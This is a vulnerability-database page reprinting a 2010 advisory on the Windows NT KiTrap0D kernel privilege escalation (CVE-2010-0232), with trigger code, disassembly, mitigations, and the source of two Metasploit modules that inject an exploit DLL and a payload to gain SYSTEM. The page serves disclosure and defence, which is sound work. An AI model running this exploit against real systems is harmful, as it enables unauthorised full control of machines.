Search...

Microsoft Windows NT User Mode To Ring 0 Escalation

2010-01-20T00:00:00

ID PACKETSTORM:85418
Type packetstorm
Reporter Tavis Ormandy
Modified 2010-01-20T00:00:00

Description

                                        
                                            `Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack  
-------------------------------------------------------------------------  
  
CVE-2010-0232  
  
In order to support BIOS service routines in legacy 16bit applications, the  
Windows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode  
monitor code. These are implemented in two stages, the kernel transitions to  
the second stage when the #GP trap handler (nt!KiTrap0D) detects that the  
faulting cs:eip matches specific magic values.  
  
Transitioning to the second stage involves restoring execution context and  
call stack (which had been previously saved) from the faulting trap frame once  
authenticity has been verified.  
  
This verification relies on the following incorrect assumptions:  
  
- Setting up a VDM context requires SeTcbPrivilege.  
- ring3 code cannot install arbitrary code segment selectors.  
- ring3 code cannot forge a trap frame.  
  
This is believed to affect every release of the Windows NT kernel, from  
Windows NT 3.1 (1993) up to and including Windows 7 (2009).  
  
Working out the details of the attack is left as an exercise for the reader.  
  
Just kidding, that was an homage to Derek Soeder :-)  
  
- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.  
  
Creating a VDM context requires EPROCESS-&gt;Flags.VdmAllowed to be set in order  
to access the authenticated system service, NtVdmControl(). VdmAllowed can  
only be set using NtSetInformationProcess(), which verifies the caller has  
SeTcbPrivilege. If this is true, the caller is very privileged and can  
certainly be trusted.  
  
This restriction can be subverted by requesting the NTVDM subsystem, and then  
using CreateRemoteThread() to execute in the context of the subsystem process,  
which will already have this flag set.  
  
- Assumption 1: ring3 code cannot install arbitrary code segment selectors.  
  
Cpl is usually equal to the two least significant bits of cs and ss, and is  
a simple way to calculate the privilege of a task. However, there is an  
exception, Virtual-8086 mode.  
  
Real mode uses a segmented addressing scheme in order to allow 16-bit  
addresses to access the 20-bit address space. This is achieved by forming  
physical addresses from a calculation like (cs &lt;&lt; 4) + (eip & 0xffff). The  
same calculation is used to map the segmented real address space onto the  
protected linear address space in Virtual-8086 mode. Therefore, I must be  
permitted to set cs to any value, and checks for disallowed or privileged  
selectors can be bypassed (PsSetLdtEnties will reject any selector where any  
of the three lower bits are unset, as is the case with the required cs pair).  
  
- Assumption 2: ring3 code cannot forge a trap frame.  
  
Returning to usermode with iret is a complicated operation, the pseudocode for  
the iret instruction alone spans several pages of Intel's Software Developers  
Manual. The operation occurs in two stages, a pre-commit stage and a  
post-commit stage. Using the VdmContext installed using NtVdmControl(), an  
invalid context can be created that causes iret to fail pre-commit, thus  
forging a trap frame.  
  
The final requirement involves predicting the address of the second-stage BIOS  
call handler. The address is static in Windows 2003, XP and earlier operating  
systems, however, Microsoft introduced kernel base randomisation in Windows  
Vista. Unfortunately, this potentially useful exploit mitigation is trivial  
to defeat locally as unprivileged users can simply query the loaded module list  
via NtQuerySystemInformation().  
  
--------------------  
Affected Software  
------------------------  
  
All 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to  
be affected, including but not limited to the following actively supported  
versions:  
  
- Windows 2000  
- Windows XP  
- Windows Server 2003  
- Windows Vista  
- Windows Server 2008  
- Windows 7  
  
--------------------  
Consequences  
-----------------------  
  
Upon successful exploitation, the kernel stack is switched to an attacker  
specified address.  
  
An attacker would trigger the vulnerability by setting up a specially  
formed VDM_TIB in their TEB, using a code sequence like this:  
  
/* ... */  
// Magic CS required for exploitation  
Tib.VdmContext.SegCs = 0x0B;  
// Pointer to fake kernel stack  
Tib.VdmContext.Esi = &KernelStack;  
// Magic IP required for exploitation  
Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;  
  
NtCurrentTeb()-&gt;Reserved4[0] = &Tib;  
/* ... */  
  
Followed by  
  
/* ... */  
NtVdmControl(VdmStartExecution, NULL);  
/* ... */  
  
Which will reach the following code sequence via the #GP trap handler,  
nt!KiTrap0D. Please note how the stack pointer is restored from the saved  
(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition  
described above.  
  
/* ... */  
.text:0043C3CE Ki386BiosCallReturnAddress proc near  
.text:0043C3CE mov eax, large fs:KPCR.SelfPcr  
.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]  
.text:0043C3D7 mov edi, [edi]  
.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]  
.text:0043C3DC mov ecx, 84h  
.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi  
.text:0043C3E4 rep movsd  
.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]  
.text:0043C3E9 add esp, 4  
.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]  
.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi  
.text:0043C3F5 mov eax, [eax+KPCR.TSS]  
.text:0043C3F8 sub edi, 220h  
.text:0043C3FE mov [eax+KTSS.Esp0], edi  
.text:0043C401 pop edx  
.text:0043C402 mov [ecx+KTHREAD.Teb], edx  
.text:0043C405 pop edx  
.text:0043C406 mov large fs:KPCR.NtTib.Self, edx  
.text:0043C40D mov ebx, large fs:KPCR.GDT  
.text:0043C414 mov [ebx+3Ah], dx  
.text:0043C418 shr edx, 10h  
.text:0043C41B mov byte ptr [ebx+3Ch], dl  
.text:0043C41E mov [ebx+3Fh], dh  
.text:0043C421 sti  
.text:0043C422 pop edi  
.text:0043C423 pop esi  
.text:0043C424 pop ebx  
.text:0043C425 pop ebp  
.text:0043C426 retn 4  
/* ... */  
  
Possibly naive example code for triggering this condition is availble from the  
link below.  
  
http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip  
  
The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista  
and Windows 7. Support for other affected operating systems is left as an  
exercise for the interested reader.  
  
-------------------  
Mitigation  
-----------------------  
  
If you believe you may be affected, you should consider applying the workaround  
described below.  
  
Temporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack  
from functioning, as without a process with VdmAllowed, it is not possible to  
access NtVdmControl() (without SeTcbPrivilege, of course).  
  
The policy template "Windows Components\Application Compatibility\Prevent  
access to 16-bit applications" may be used within the group policy editor to  
prevent unprivileged users from executing 16-bit applications. I'm informed  
this is an officially supported machine configuration.  
  
Administrators unfamiliar with group policy may find the videos below  
instructive. Further information is available from the Windows Server  
Group Policy Home  
  
http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.  
  
To watch a demonstration of this policy being applied to a Windows Server 2003  
domain controller, see the link below.  
  
http://www.youtube.com/watch?v=XRVI4iQ2Nug  
  
To watch a demonstration of this policy being applied to a Windows Server 2008  
domain controller, see the link below.  
  
http://www.youtube.com/watch?v=u8pfXW7crEQ  
  
To watch a demonstration of this policy being applied to a shared but  
unjoined Windows XP Professional machine, see the link below.  
  
http://www.youtube.com/watch?v=u7Y6d-BVwxk  
  
On Windows NT4, the following knowledgebase article explains how to disable the  
NTVDM and WOWEXEC subsystems.  
  
http://support.microsoft.com/kb/220159  
  
Applying these configuration changes will temporarily prevent users from  
accessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users  
require this functionality.  
  
If you do not require this feature and depend on NT security, consider  
permanently disabling it in order to reduce kernel attack surface.  
  
-------------------  
Solution  
-----------------------  
  
Microsoft was informed about this vulnerability on 12-Jun-2009, and they  
confirmed receipt of my report on 22-Jun-2009.  
  
Regrettably, no official patch is currently available. As an effective and easy  
to deploy workaround is available, I have concluded that it is in the best  
interest of users to go ahead with the publication of this document without an  
official patch. It should be noted that very few users rely on NT security, the  
primary audience of this advisory is expected to be domain administrators and  
security professionals.  
  
-------------------  
Credit  
-----------------------  
  
This bug was discovered by Tavis Ormandy.  
  
-------------------  
Greetz  
-----------------------  
  
Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,  
ScaryBeasts, spender and all my other elite colleagues.  
  
Check out some photography while at ring0 @ http://flickr.com/meder.  
  
-------------------  
References  
-----------------------  
  
Derek Soeder has previously reported some legendary NT bugs, including multiple  
vdm bugs that, while unrelated to this issue, make fascinating reading.  
  
- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege Escalation  
- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege Escalation  
- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition Privilege Escalation  
  
-------------------  
Appendix  
-----------------------  
  
SHA-1 checksum of KiTrap0D.zip follows.  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
99a047427e9085d52aaddfc9214fd1a621534072 KiTrap0D.zip  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.5 (GNU/Linux)  
  
iQEVAwUBS1W6+RvyfE4zaHEXAQK//QgAvo/VhPdeASGe7SSfC3jLwNzsfVfM+FMo  
x7JZMMfVUh6b/+FxvokIpsCUf7QQkv+YcyCiatutVjUok5aw5BirFtPLHORIIKPX  
B5gN2a4G8RIXh5yKE6FffKGQsPJNW1Ua5Jss8rf59TEj3EDky1vco+WVmmz7TsHn  
TQdUreVcL8wFmCAgq5X0AKrdepYDBmYLF0AUFOdG3mKJ43dnP59p9R7+ckv0pfLW  
XtvOgzZDNMew4z2Z53YQpE7dO+Y3H3rnhLN7jF7i9We9iiG4ATDke8byFAIDZQZx  
ucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg==  
=LHU0  
-----END PGP SIGNATURE-----  
  
--   
-------------------------------------  
taviso@sdf.lonestar.org | finger me for my gpg key.  
-------------------------------------------------------  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:85418", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft Windows NT User Mode To Ring 0 Escalation", "description": "", "published": "2010-01-20T00:00:00", "modified": "2010-01-20T00:00:00", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "href": "https://packetstormsecurity.com/files/85418/Microsoft-Windows-NT-User-Mode-To-Ring-0-Escalation.html", "reporter": "Tavis Ormandy", "references": [], "cvelist": ["CVE-2010-0232"], "lastseen": "2016-12-05T22:11:31", "viewCount": 17, "enchantments": {"score": {"value": 6.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:27958A04-890E-49AE-AF68-452CEF076E07"]}, {"type": "canvas", "idList": ["MS_NTVDM"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2010-104", "SBP-2010-11"]}, {"type": "cve", "idList": ["CVE-2010-0232"]}, {"type": "exploitdb", "idList": ["EDB-ID:11199"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F4016014B77200EC5255A8FF54D214B2"]}, {"type": "kitploit", "idList": ["KITPLOIT:9023364724481532416"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/MS10_015_KITRAP0D", "MSF:EXPLOIT/WINDOWS/LOCAL/MS10_015_KITRAP0D/"]}, {"type": "mskb", "idList": ["KB977165"]}, {"type": "n0where", "idList": ["N0WHERE:783"]}, {"type": "nessus", "idList": ["SMB_NT_MS10-015.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800442", "OPENVAS:1361412562310801914", "OPENVAS:1361412562310900740", "OPENVAS:800442", "OPENVAS:801914", "OPENVAS:900740"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:111404", "PACKETSTORM:124025"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23118", "SECURITYVULNS:DOC:23210", "SECURITYVULNS:DOC:27844", "SECURITYVULNS:VULN:10553", "SECURITYVULNS:VULN:10612"]}, {"type": "seebug", "idList": ["SSV:18977", "SSV:19185", "SSV:67537"]}, {"type": "zdt", "idList": ["1337DAY-ID-21523"]}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:27958A04-890E-49AE-AF68-452CEF076E07"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2010-104"]}, {"type": "cve", "idList": ["CVE-2010-0232"]}, {"type": "exploitdb", "idList": ["EDB-ID:11199"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/MS10_015_KITRAP0D"]}, {"type": "n0where", "idList": ["N0WHERE:783"]}, {"type": "nessus", "idList": ["SMB_NT_MS10-015.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:111404"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27844"]}, {"type": "seebug", "idList": ["SSV:67537"]}]}, "exploitation": null, "vulnersScore": 6.1}, "sourceHref": "https://packetstormsecurity.com/files/download/85418/mswinnt-pwn.txt", "sourceData": "`Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack \n------------------------------------------------------------------------- \n \nCVE-2010-0232 \n \nIn order to support BIOS service routines in legacy 16bit applications, the \nWindows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode \nmonitor code. These are implemented in two stages, the kernel transitions to \nthe second stage when the #GP trap handler (nt!KiTrap0D) detects that the \nfaulting cs:eip matches specific magic values. \n \nTransitioning to the second stage involves restoring execution context and \ncall stack (which had been previously saved) from the faulting trap frame once \nauthenticity has been verified. \n \nThis verification relies on the following incorrect assumptions: \n \n- Setting up a VDM context requires SeTcbPrivilege. \n- ring3 code cannot install arbitrary code segment selectors. \n- ring3 code cannot forge a trap frame. \n \nThis is believed to affect every release of the Windows NT kernel, from \nWindows NT 3.1 (1993) up to and including Windows 7 (2009). \n \nWorking out the details of the attack is left as an exercise for the reader. \n \nJust kidding, that was an homage to Derek Soeder :-) \n \n- Assumption 0: Setting up a VDM context requires SeTcbPrivilege. \n \nCreating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order \nto access the authenticated system service, NtVdmControl(). VdmAllowed can \nonly be set using NtSetInformationProcess(), which verifies the caller has \nSeTcbPrivilege. If this is true, the caller is very privileged and can \ncertainly be trusted. \n \nThis restriction can be subverted by requesting the NTVDM subsystem, and then \nusing CreateRemoteThread() to execute in the context of the subsystem process, \nwhich will already have this flag set. \n \n- Assumption 1: ring3 code cannot install arbitrary code segment selectors. \n \nCpl is usually equal to the two least significant bits of cs and ss, and is \na simple way to calculate the privilege of a task. However, there is an \nexception, Virtual-8086 mode. \n \nReal mode uses a segmented addressing scheme in order to allow 16-bit \naddresses to access the 20-bit address space. This is achieved by forming \nphysical addresses from a calculation like (cs << 4) + (eip & 0xffff). The \nsame calculation is used to map the segmented real address space onto the \nprotected linear address space in Virtual-8086 mode. Therefore, I must be \npermitted to set cs to any value, and checks for disallowed or privileged \nselectors can be bypassed (PsSetLdtEnties will reject any selector where any \nof the three lower bits are unset, as is the case with the required cs pair). \n \n- Assumption 2: ring3 code cannot forge a trap frame. \n \nReturning to usermode with iret is a complicated operation, the pseudocode for \nthe iret instruction alone spans several pages of Intel's Software Developers \nManual. The operation occurs in two stages, a pre-commit stage and a \npost-commit stage. Using the VdmContext installed using NtVdmControl(), an \ninvalid context can be created that causes iret to fail pre-commit, thus \nforging a trap frame. \n \nThe final requirement involves predicting the address of the second-stage BIOS \ncall handler. The address is static in Windows 2003, XP and earlier operating \nsystems, however, Microsoft introduced kernel base randomisation in Windows \nVista. Unfortunately, this potentially useful exploit mitigation is trivial \nto defeat locally as unprivileged users can simply query the loaded module list \nvia NtQuerySystemInformation(). \n \n-------------------- \nAffected Software \n------------------------ \n \nAll 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to \nbe affected, including but not limited to the following actively supported \nversions: \n \n- Windows 2000 \n- Windows XP \n- Windows Server 2003 \n- Windows Vista \n- Windows Server 2008 \n- Windows 7 \n \n-------------------- \nConsequences \n----------------------- \n \nUpon successful exploitation, the kernel stack is switched to an attacker \nspecified address. \n \nAn attacker would trigger the vulnerability by setting up a specially \nformed VDM_TIB in their TEB, using a code sequence like this: \n \n/* ... */ \n// Magic CS required for exploitation \nTib.VdmContext.SegCs = 0x0B; \n// Pointer to fake kernel stack \nTib.VdmContext.Esi = &KernelStack; \n// Magic IP required for exploitation \nTib.VdmContext.Eip = Ki386BiosCallReturnAddress; \n \nNtCurrentTeb()->Reserved4[0] = &Tib; \n/* ... */ \n \nFollowed by \n \n/* ... */ \nNtVdmControl(VdmStartExecution, NULL); \n/* ... */ \n \nWhich will reach the following code sequence via the #GP trap handler, \nnt!KiTrap0D. Please note how the stack pointer is restored from the saved \n(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition \ndescribed above. \n \n/* ... */ \n.text:0043C3CE Ki386BiosCallReturnAddress proc near \n.text:0043C3CE mov eax, large fs:KPCR.SelfPcr \n.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi] \n.text:0043C3D7 mov edi, [edi] \n.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase] \n.text:0043C3DC mov ecx, 84h \n.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi \n.text:0043C3E4 rep movsd \n.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi] \n.text:0043C3E9 add esp, 4 \n.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread] \n.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi \n.text:0043C3F5 mov eax, [eax+KPCR.TSS] \n.text:0043C3F8 sub edi, 220h \n.text:0043C3FE mov [eax+KTSS.Esp0], edi \n.text:0043C401 pop edx \n.text:0043C402 mov [ecx+KTHREAD.Teb], edx \n.text:0043C405 pop edx \n.text:0043C406 mov large fs:KPCR.NtTib.Self, edx \n.text:0043C40D mov ebx, large fs:KPCR.GDT \n.text:0043C414 mov [ebx+3Ah], dx \n.text:0043C418 shr edx, 10h \n.text:0043C41B mov byte ptr [ebx+3Ch], dl \n.text:0043C41E mov [ebx+3Fh], dh \n.text:0043C421 sti \n.text:0043C422 pop edi \n.text:0043C423 pop esi \n.text:0043C424 pop ebx \n.text:0043C425 pop ebp \n.text:0043C426 retn 4 \n/* ... */ \n \nPossibly naive example code for triggering this condition is availble from the \nlink below. \n \nhttp://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip \n \nThe code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista \nand Windows 7. Support for other affected operating systems is left as an \nexercise for the interested reader. \n \n------------------- \nMitigation \n----------------------- \n \nIf you believe you may be affected, you should consider applying the workaround \ndescribed below. \n \nTemporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack \nfrom functioning, as without a process with VdmAllowed, it is not possible to \naccess NtVdmControl() (without SeTcbPrivilege, of course). \n \nThe policy template \"Windows Components\\Application Compatibility\\Prevent \naccess to 16-bit applications\" may be used within the group policy editor to \nprevent unprivileged users from executing 16-bit applications. I'm informed \nthis is an officially supported machine configuration. \n \nAdministrators unfamiliar with group policy may find the videos below \ninstructive. Further information is available from the Windows Server \nGroup Policy Home \n \nhttp://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx. \n \nTo watch a demonstration of this policy being applied to a Windows Server 2003 \ndomain controller, see the link below. \n \nhttp://www.youtube.com/watch?v=XRVI4iQ2Nug \n \nTo watch a demonstration of this policy being applied to a Windows Server 2008 \ndomain controller, see the link below. \n \nhttp://www.youtube.com/watch?v=u8pfXW7crEQ \n \nTo watch a demonstration of this policy being applied to a shared but \nunjoined Windows XP Professional machine, see the link below. \n \nhttp://www.youtube.com/watch?v=u7Y6d-BVwxk \n \nOn Windows NT4, the following knowledgebase article explains how to disable the \nNTVDM and WOWEXEC subsystems. \n \nhttp://support.microsoft.com/kb/220159 \n \nApplying these configuration changes will temporarily prevent users from \naccessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users \nrequire this functionality. \n \nIf you do not require this feature and depend on NT security, consider \npermanently disabling it in order to reduce kernel attack surface. \n \n------------------- \nSolution \n----------------------- \n \nMicrosoft was informed about this vulnerability on 12-Jun-2009, and they \nconfirmed receipt of my report on 22-Jun-2009. \n \nRegrettably, no official patch is currently available. As an effective and easy \nto deploy workaround is available, I have concluded that it is in the best \ninterest of users to go ahead with the publication of this document without an \nofficial patch. It should be noted that very few users rely on NT security, the \nprimary audience of this advisory is expected to be domain administrators and \nsecurity professionals. \n \n------------------- \nCredit \n----------------------- \n \nThis bug was discovered by Tavis Ormandy. \n \n------------------- \nGreetz \n----------------------- \n \nGreetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK, \nScaryBeasts, spender and all my other elite colleagues. \n \nCheck out some photography while at ring0 @ http://flickr.com/meder. \n \n------------------- \nReferences \n----------------------- \n \nDerek Soeder has previously reported some legendary NT bugs, including multiple \nvdm bugs that, while unrelated to this issue, make fascinating reading. \n \n- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege Escalation \n- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege Escalation \n- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition Privilege Escalation \n \n------------------- \nAppendix \n----------------------- \n \nSHA-1 checksum of KiTrap0D.zip follows. \n \n-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n99a047427e9085d52aaddfc9214fd1a621534072 KiTrap0D.zip \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.5 (GNU/Linux) \n \niQEVAwUBS1W6+RvyfE4zaHEXAQK//QgAvo/VhPdeASGe7SSfC3jLwNzsfVfM+FMo \nx7JZMMfVUh6b/+FxvokIpsCUf7QQkv+YcyCiatutVjUok5aw5BirFtPLHORIIKPX \nB5gN2a4G8RIXh5yKE6FffKGQsPJNW1Ua5Jss8rf59TEj3EDky1vco+WVmmz7TsHn \nTQdUreVcL8wFmCAgq5X0AKrdepYDBmYLF0AUFOdG3mKJ43dnP59p9R7+ckv0pfLW \nXtvOgzZDNMew4z2Z53YQpE7dO+Y3H3rnhLN7jF7i9We9iiG4ATDke8byFAIDZQZx \nucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg== \n=LHU0 \n-----END PGP SIGNATURE----- \n \n-- \n------------------------------------- \ntaviso@sdf.lonestar.org | finger me for my gpg key. \n------------------------------------------------------- \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"metasploit": [{"lastseen": "2022-03-18T05:02:19", "description": "This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.\n", "cvss3": {}, "published": "2013-11-11T07:14:40", "type": "metasploit", "title": "Windows SYSTEM Escalation via KiTrap0D", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2021-07-23T17:34:25", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS10_015_KITRAP0D/", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/ms10_015_kitrap0d/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows SYSTEM Escalation via KiTrap0D',\n 'Description' => %q{\n This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Tavis Ormandy', # Original resesarcher and exploit creator\n 'HD Moore', # Port of Tavis' code to meterpreter module\n 'Pusscat', # Port of Tavis' code to meterpreter module\n 'OJ Reeves' # Port of meterpreter code to a windows local exploit\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]\n ],\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2010-0232' ],\n [ 'OSVDB', '61854' ],\n [ 'MSB', 'MS10-015' ],\n [ 'EDB', '11199' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2010/Jan/341' ]\n ],\n 'DisclosureDate'=> '2010-01-19'\n ))\n\n end\n\n def check\n # Validate platform architecture\n if sysinfo[\"Architecture\"] == ARCH_X64\n return Exploit::CheckCode::Safe\n end\n\n # Validate OS version\n winver = sysinfo[\"OS\"]\n unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Detected\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system.\")\n end\n\n print_status(\"Reflectively injecting payload and triggering the bug...\")\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2010-0232\", \"kitrap0d.x86.dll\"),\n encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms10_015_kitrap0d.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-07-13T19:36:39", "description": "This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.\n", "edition": 2, "cvss3": {}, "published": "2013-11-11T07:14:40", "type": "metasploit", "title": "Windows SYSTEM Escalation via KiTrap0D", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2018-09-15T23:54:45", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS10_015_KITRAP0D", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows SYSTEM Escalation via KiTrap0D',\n 'Description' => %q{\n This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Tavis Ormandy', # Original resesarcher and exploit creator\n 'HD Moore', # Port of Tavis' code to meterpreter module\n 'Pusscat', # Port of Tavis' code to meterpreter module\n 'OJ Reeves' # Port of meterpreter code to a windows local exploit\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]\n ],\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2010-0232' ],\n [ 'OSVDB', '61854' ],\n [ 'MSB', 'MS10-015' ],\n [ 'EDB', '11199' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2010/Jan/341' ]\n ],\n 'DisclosureDate'=> \"Jan 19 2010\"\n ))\n\n end\n\n def check\n # Validate platform architecture\n if sysinfo[\"Architecture\"] == ARCH_X64\n return Exploit::CheckCode::Safe\n end\n\n # Validate OS version\n winver = sysinfo[\"OS\"]\n unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Detected\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system.\")\n end\n\n print_status(\"Launching notepad to host the exploit...\")\n process = client.sys.process.execute(\"notepad.exe\", nil, {'Hidden' => true})\n host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\",\n \"CVE-2010-0232\", \"kitrap0d.x86.dll\")\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid} ...\")\n exploit_mem, offset = inject_dll_into_process(host_process, library_path)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(host_process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status(\"Payload injected. Executing exploit...\")\n host_process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good(\"Exploit finished, wait for (hopefully privileged) payload 